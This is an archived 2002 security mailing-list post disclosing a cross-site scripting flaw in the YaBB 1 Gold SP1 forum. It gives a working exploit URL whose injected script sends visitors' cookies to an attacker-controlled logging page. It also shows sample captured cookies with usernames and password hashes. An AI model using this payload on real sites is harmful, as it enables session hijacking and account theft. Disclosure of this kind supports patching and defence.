Cross-site Scripting Vulnerability in YaBB 1 Gold - SP1!

From: Fabricio Angeletti (f_a_aat_private)
Date: Sun Dec 01 2002 - 16:59:01 PST

Next message: Martin Schulze: "[SECURITY] [DSA 201-1] New Free/SWan packages fix denial of service"

Previous message: Matthew Murphy: "Multiple pServ Remote Buffer Overflow Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

 
http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269>location%3d'http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>

 num is a post that doesn't exist
 board must be a valid and accessable board
 X.php script to log the cookie

 that in an example of the cookie
 268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
 272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY

 Tested in  YaBB 1 Gold - SP1!

 i discover this now, i know isnt much but u can do
 steal the user identity and maybe u can try to change
the password too (there is another old vuln but i dont
know if work here)

 Sorry for my bad english

 Bye



_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com

Next message: Martin Schulze: "[SECURITY] [DSA 201-1] New Free/SWan packages fix denial of service"
Previous message: Matthew Murphy: "Multiple pServ Remote Buffer Overflow Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 09:05:09 PST